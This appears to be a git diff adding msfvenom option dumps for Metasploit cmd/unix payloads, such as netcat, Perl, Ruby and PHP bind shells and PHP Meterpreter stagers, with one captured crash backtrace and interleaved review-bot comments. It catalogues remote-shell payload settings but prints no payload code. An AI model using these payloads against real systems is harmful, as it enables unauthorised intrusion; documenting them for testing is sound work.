@@ -0,0 +1,32 @@ + + Name: Unix Command Shell, Bind TCP (via Lua) + Module: payload/cmd/unix/bind_lua + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 218 + Rank: Normal + +Provided by: + xistence + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Listen for a connection and spawn a command shell via Lua + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + LuaPath lua yes The path to the Lua executable + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-bind_netcat.txt b/msfvenom/payload_options/cmd-unix-bind_netcat.txt new file mode 100644 index 0000000..84781a0 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-bind_netcat.txt 
@@ -0,0 +1,35 @@ + + Name: Unix Command Shell, Bind TCP (via netcat) + Module: payload/cmd/unix/bind_netcat + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + m-1-k-3 + egypt + juan vazquez + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Listen for a connection and spawn a command shell via netcat + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + NetcatPath nc yes The path to the Netcat executable + ShellPath /bin/sh yes The path to the shell to execute + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-bind_netcat_gaping.txt b/msfvenom/payload_options/cmd-unix-bind_netcat_gaping.txt new file mode 100644 index 0000000..fc7db50 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-bind_netcat_gaping.txt 
@@ -0,0 +1,33 @@ + + Name: Unix Command Shell, Bind TCP (via netcat -e) + Module: payload/cmd/unix/bind_netcat_gaping + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 24 + Rank: Normal + +Provided by: + hdm + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Listen for a connection and spawn a command shell via netcat + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + NetcatPath nc yes The path to the Netcat executable + ShellPath /bin/sh yes The path to the shell to execute + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-bind_netcat_gaping_ipv6.txt b/msfvenom/payload_options/cmd-unix-bind_netcat_gaping_ipv6.txt new file mode 100644 index 0000000..ed807e6 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-bind_netcat_gaping_ipv6.txt 
@@ -0,0 +1,33 @@ + + Name: Unix Command Shell, Bind TCP (via netcat -e) IPv6 + Module: payload/cmd/unix/bind_netcat_gaping_ipv6 + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 25 + Rank: Normal + +Provided by: + hdm + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Listen for a connection and spawn a command shell via netcat + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + NetcatPath nc yes The path to the Netcat executable + ShellPath /bin/sh yes The path to the shell to execute + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-bind_nodejs.txt b/msfvenom/payload_options/cmd-unix-bind_nodejs.txt new file mode 100644 index 0000000..d0eafde --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-bind_nodejs.txt 
@@ -0,0 +1,31 @@ + + Name: Unix Command Shell, Bind TCP (via nodejs) + Module: payload/cmd/unix/bind_nodejs + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 2239 + Rank: Normal + +Provided by: + joev + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Continually listen for a connection and spawn a command shell via nodejs + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-bind_perl.txt b/msfvenom/payload_options/cmd-unix-bind_perl.txt new file mode 100644 index 0000000..079bdc4 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-bind_perl.txt 
@@ -0,0 +1,33 @@ + + Name: Unix Command Shell, Bind TCP (via Perl) + Module: payload/cmd/unix/bind_perl + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 240 + Rank: Normal + +Provided by: + Samy + cazz + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Listen for a connection and spawn a command shell via perl + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PerlPath perl yes The path to the Perl executable + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-bind_perl_ipv6.txt b/msfvenom/payload_options/cmd-unix-bind_perl_ipv6.txt new file mode 100644 index 0000000..b5444d1 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-bind_perl_ipv6.txt 
@@ -0,0 +1,33 @@ + + Name: Unix Command Shell, Bind TCP (via perl) IPv6 + Module: payload/cmd/unix/bind_perl_ipv6 + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 152 + Rank: Normal + +Provided by: + Samy + cazz + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Listen for a connection and spawn a command shell via perl + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PerlPath perl yes The path to the Perl executable + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-bind_r.txt b/msfvenom/payload_options/cmd-unix-bind_r.txt new file mode 100644 index 0000000..a5f9d9c --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-bind_r.txt 
@@ -0,0 +1,32 @@ + + Name: Unix Command Shell, Bind TCP (via R) + Module: payload/cmd/unix/bind_r + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 132 + Rank: Normal + +Provided by: + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Continually listen for a connection and spawn a command shell via R + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + RPath R yes The path to the R executable + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-bind_ruby.txt b/msfvenom/payload_options/cmd-unix-bind_ruby.txt new file mode 100644 index 0000000..916c15a --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-bind_ruby.txt 
@@ -0,0 +1,32 @@ + + Name: Unix Command Shell, Bind TCP (via Ruby) + Module: payload/cmd/unix/bind_ruby + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 137 + Rank: Normal + +Provided by: + kris katterjohn + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Continually listen for a connection and spawn a command shell via Ruby + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + RubyPath ruby yes The path to the Ruby executable + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-bind_ruby_ipv6.txt b/msfvenom/payload_options/cmd-unix-bind_ruby_ipv6.txt new file mode 100644 index 0000000..bd2e650 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-bind_ruby_ipv6.txt 
@@ -0,0 +1,32 @@ + + Name: Unix Command Shell, Bind TCP (via Ruby) IPv6 + Module: payload/cmd/unix/bind_ruby_ipv6 + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 142 + Rank: Normal + +Provided by: + kris katterjohn + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Continually listen for a connection and spawn a command shell via Ruby + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + RubyPath ruby yes The path to the Ruby executable + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-bind_socat_sctp.txt b/msfvenom/payload_options/cmd-unix-bind_socat_sctp.txt new file mode 100644 index 0000000..f7250fc --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-bind_socat_sctp.txt 
@@ -0,0 +1,34 @@ + + Name: Unix Command Shell, Bind SCTP (via socat) + Module: payload/cmd/unix/bind_socat_sctp + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 71 + Rank: Normal + +Provided by: + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CHOST no The local client address +CPORT no The local client port +LPORT 4444 yes The listen port +Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, http, socks4, socks5, socks5h +RHOST no The target address + +Description: + Creates an interactive shell via socat + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-bind_socat_udp.txt b/msfvenom/payload_options/cmd-unix-bind_socat_udp.txt new file mode 100644 index 0000000..adb43f4 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-bind_socat_udp.txt 
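Review bot: this bind_socat_sctp dump lists CHOST, CPORT and Proxies under Basic options and has no SocatPath or BashPath rows, while the bind_socat_udp dump that follows shows SocatPath and BashPath and none of the client-side options; worth confirming both files were produced from the same framework checkout before committing, since the two socat variants would normally expose the same executable-path options.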
@@ -0,0 +1,33 @@ + + Name: Unix Command Shell, Bind UDP (via socat) + Module: payload/cmd/unix/bind_socat_udp + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 70 + Rank: Normal + +Provided by: + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Creates an interactive shell via socat + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + BashPath bash yes The path to the Bash executable + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + SocatPath socat yes The path to the Socat executable + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-bind_stub.txt b/msfvenom/payload_options/cmd-unix-bind_stub.txt new file mode 100644 index 0000000..fe0abde --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-bind_stub.txt 
@@ -0,0 +1,31 @@ + + Name: Unix Command Shell, Bind TCP (stub) + Module: payload/cmd/unix/bind_stub + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 0 + Rank: Normal + +Provided by: + hdm + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Listen for a connection and spawn a command shell (stub only, no payload) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-bind_zsh.txt b/msfvenom/payload_options/cmd-unix-bind_zsh.txt new file mode 100644 index 0000000..6d94168 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-bind_zsh.txt 
@@ -0,0 +1,34 @@ + + Name: Unix Command Shell, Bind TCP (via Zsh) + Module: payload/cmd/unix/bind_zsh + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 99 + Rank: Normal + +Provided by: + Doug Prostko + Wang Yihang + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Listen for a connection and spawn a command shell via Zsh. Note: Although Zsh is + often available, please be aware it isn't usually installed by default. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + ZSHPath zsh yes The path to the ZSH executable + diff --git a/msfvenom/payload_options/cmd-unix-generic.txt b/msfvenom/payload_options/cmd-unix-generic.txt new file mode 100644 index 0000000..97e4fea --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-generic.txt 
@@ -0,0 +1,30 @@ + + Name: Unix Command, Generic Command Execution + Module: payload/cmd/unix/generic + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 0 + Rank: Normal + +Provided by: + hdm + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD yes The command string to execute + +Description: + Executes the supplied command + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-interact.txt b/msfvenom/payload_options/cmd-unix-interact.txt new file mode 100644 index 0000000..c8d77a1 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-interact.txt @@ -0,0 +1,25 @@ + + Name: Unix Command, Interact with Established Connection + Module: payload/cmd/unix/interact + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 0 + Rank: Normal + +Provided by: + hdm + +Description: + Interacts with a shell on an established socket connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
diff --git a/msfvenom/payload_options/cmd-unix-php-bind_php.txt b/msfvenom/payload_options/cmd-unix-php-bind_php.txt new file mode 100644 index 0000000..b91fb1a --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-php-bind_php.txt @@ -0,0 +1,36 @@ + + Name: PHP Exec, PHP Command Shell, Bind TCP (via PHP) + Module: payload/cmd/unix/php/bind_php + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 1258 + Rank: Normal + +Provided by: + Spencer McIntyre + msutovsky-r7 + egypt + diaul + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Execute a PHP payload as an OS command from a Posix-compatible shell. + + Listen for a connection and spawn a command shell via php + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-php-bind_php_ipv6.txt b/msfvenom/payload_options/cmd-unix-php-bind_php_ipv6.txt new file mode 100644 index 0000000..6959dc6 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-php-bind_php_ipv6.txt 
@@ -0,0 +1,36 @@ + + Name: PHP Exec, PHP Command Shell, Bind TCP (via php) IPv6 + Module: payload/cmd/unix/php/bind_php_ipv6 + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 1254 + Rank: Normal + +Provided by: + Spencer McIntyre + msutovsky-r7 + egypt + diaul + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Execute a PHP payload as an OS command from a Posix-compatible shell. + + Listen for a connection and spawn a command shell via php (IPv6) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-php-download_exec.txt b/msfvenom/payload_options/cmd-unix-php-download_exec.txt new file mode 100644 index 0000000..255b2cc --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-php-download_exec.txt 
@@ -0,0 +1,28 @@ + + Name: PHP Exec + Module: payload/cmd/unix/php/download_exec + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 1276 + Rank: Normal + +Provided by: + Spencer McIntyre + msutovsky-r7 + egypt + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +URL yes The pre-encoded URL to the executable + +Description: + Execute a PHP payload as an OS command from a Posix-compatible shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-php-exec.txt b/msfvenom/payload_options/cmd-unix-php-exec.txt new file mode 100644 index 0000000..4aa0ccb --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-php-exec.txt @@ -0,0 +1,10 @@ +Options for payload/cmd/unix/php/exec: +========================= + +/usr/share/metasploit-framework/modules/payloads/singles/php/exec.rb:35:in `php_exec_cmd': undefined method `shell' for #<#:0x0000007f6cf9c450> (NoMethodError) + from /usr/share/metasploit-framework/modules/payloads/singles/php/exec.rb:47:in `generate' + from /usr/share/metasploit-framework/modules/payloads/adapters/cmd/unix/php.rb:34:in `generate' + from /usr/share/metasploit-framework/lib/msf/core/payload.rb:195:in `size' + from /usr/share/metasploit-framework/lib/msf/base/serializer/readable_text.rb:500:in `dump_payload_module' + from /usr/share/metasploit-framework/lib/msf/base/serializer/readable_text.rb:26:in `dump_module' + from /usr/bin/msfvenom:461:in `
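Review bot: cmd-unix-php-exec.txt contains a Ruby backtrace (`undefined method 'shell' ... (NoMethodError)` raised from php/exec.rb:35 while msfvenom computed the payload size) instead of the module's option table, so the committed file documents a crash rather than the payload; either drop this file from the change until the `php_exec_cmd` failure is resolved upstream and regenerate it then, or have the generator detect a non-zero exit and skip writing the output. As committed it also embeds host-specific absolute paths and an object address (`0x0000007f6cf9c450`) that will differ on every run.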
' diff --git a/msfvenom/payload_options/cmd-unix-php-meterpreter-bind_tcp.txt b/msfvenom/payload_options/cmd-unix-php-meterpreter-bind_tcp.txt new file mode 100644 index 0000000..3dfc360 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-php-meterpreter-bind_tcp.txt 
@@ -0,0 +1,58 @@ + + Name: PHP Exec, PHP Meterpreter, Bind TCP Stager + Module: payload/cmd/unix/php/meterpreter/bind_tcp + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 862 + Rank: Normal + +Provided by: + Spencer McIntyre + msutovsky-r7 + egypt + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Execute a PHP payload as an OS command from a Posix-compatible shell. + + Run a meterpreter server in PHP. + + Listen for a connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use 
when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-php-meterpreter-bind_tcp_ipv6.txt b/msfvenom/payload_options/cmd-unix-php-meterpreter-bind_tcp_ipv6.txt new file mode 100644 index 0000000..8b9c1bf --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-php-meterpreter-bind_tcp_ipv6.txt 
@@ -0,0 +1,58 @@ + + Name: PHP Exec, PHP Meterpreter, Bind TCP Stager IPv6 + Module: payload/cmd/unix/php/meterpreter/bind_tcp_ipv6 + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 856 + Rank: Normal + +Provided by: + Spencer McIntyre + msutovsky-r7 + egypt + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Execute a PHP payload as an OS command from a Posix-compatible shell. + + Run a meterpreter server in PHP. + + Listen for a connection over IPv6 + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no 
A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-php-meterpreter-bind_tcp_ipv6_uuid.txt b/msfvenom/payload_options/cmd-unix-php-meterpreter-bind_tcp_ipv6_uuid.txt new file mode 100644 index 0000000..eddc1db --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-php-meterpreter-bind_tcp_ipv6_uuid.txt 
@@ -0,0 +1,59 @@ + + Name: PHP Exec, PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support + Module: payload/cmd/unix/php/meterpreter/bind_tcp_ipv6_uuid + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 856 + Rank: Normal + +Provided by: + Spencer McIntyre + msutovsky-r7 + egypt + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Execute a PHP payload as an OS command from a Posix-compatible shell. + + Run a meterpreter server in PHP. + + Listen for a connection over IPv6 with UUID Support + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the 
raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-php-meterpreter-bind_tcp_uuid.txt b/msfvenom/payload_options/cmd-unix-php-meterpreter-bind_tcp_uuid.txt new file mode 100644 index 0000000..c280bc7 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-php-meterpreter-bind_tcp_uuid.txt 
